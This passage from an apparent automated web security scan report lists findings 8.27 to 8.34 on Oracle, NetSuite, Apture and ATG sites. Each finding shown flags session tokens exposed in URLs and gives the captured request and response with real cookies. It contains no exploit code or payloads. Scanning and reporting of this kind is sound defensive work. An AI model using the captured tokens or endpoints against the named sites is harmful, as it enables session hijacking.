GET /EndUser/jscripts/s_validation.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:09:35 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 18 Mar 2011 13:50:52 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=242;ecid=30186729237082835,0)
Content-Length: 4274

/* Used to attach and remove error message which are not set or removed on
* server side validators.
*/
function checkOnLoad()
{
var inputs = document.getElementsByTagName('input');
var spans =
...[SNIP]...

8.27. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://netsuite.tt.omtrdc.net
Path:   /m2/netsuite/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:32:28 GMT; Path=/m2/netsuite
Content-Type: text/javascript
Content-Length: 173
Date: Tue, 06 Sep 2011 15:32:27 GMT
Server: Test & Target

mboxFactories.get('default').get('me-ecomm-form-test',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");

8.28. http://www.apture.com/js/apture.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/apture.js?siteToken=H0arRY0 HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=FQtL8KWd11

Response

HTTP/1.0 200 OK
Content-Length: 2642
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:33:01 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.readwriteweb.com/enterprise/2010/11/oracle.php";A.visitId="a0e3f59a335046f79ededb918544b382";A.u
...[SNIP]...

8.29. http://www.atg.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.atg.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:32:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:32:21 GMT
Content-Length: 53080
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<l
...[SNIP]...
<li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+">Course Schedule</a>
...[SNIP]...

8.30. http://www.atg.com/en/solutions/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.atg.com
Path:   /en/solutions/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/solutions/ HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.1.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:35:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:35:05 GMT
Content-Length: 42222
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>ATG Commerce So
...[SNIP]...
<li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+">Course Schedule</a>
...[SNIP]...

8.31. http://www.atg.com/service/main.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.atg.com
Path:   /service/main.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Content-Language: 7cd9f92e1f6617753dfce39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:06 GMT
Content-Length: 116200
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200191">Product &amp; Services</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200192">Platform</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200199">Applications</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200227">Deployment and Performance</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200192">Platform</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200195">Adaptive Scenario Engine</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200197">Content Administration</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200194">Portal</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200199">Applications</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200200">Commerce and Merchandising Products</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200216">Active Primus</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200200">Commerce and Merchandising Products</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200202">Merchandising</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200228">Information Type</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200239">Knowledge Base Solutions</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=300004">Sample Code</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200230">Technical References</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200232">Customer Case Studies</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200238">Problem Reports</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200229">Product Documentation</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200236">Release Notes</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200231">Solution Sheets</a>,&nbsp;
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=400004">White Papers</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=3">Other</a></dt>
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200216">Active Primus</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200219">Primus Enterprise Search</a>
...[SNIP]...
<span>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=1" onclick="atgss_preserveUrlHash(this)">Next</a>
...[SNIP]...
<span>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=19.0" onclick="atgss_preserveUrlHash(this)">Last</a>
...[SNIP]...

8.32. http://www.atg.com/service/main.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.atg.com
Path:   /service/main.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Content-Language: 7cd9f92e1f6617753dfce39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:06 GMT
Content-Length: 116200
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe
...[SNIP]...

8.33. https://www.atg.com/en/customers/listing/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.atg.com
Path:   /en/customers/listing/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/customers/listing/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/en/password/request/?successURL=/en/password/request/success/&_requestid=161697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:56:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:56:47 GMT
Content-Length: 49691
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>ATG Customers</
...[SNIP]...
<li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+">Course Schedule</a>
...[SNIP]...

8.34. https://www.atg.com/en/password/request/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.atg.com
Path:   /en/password/request/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/password/request/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
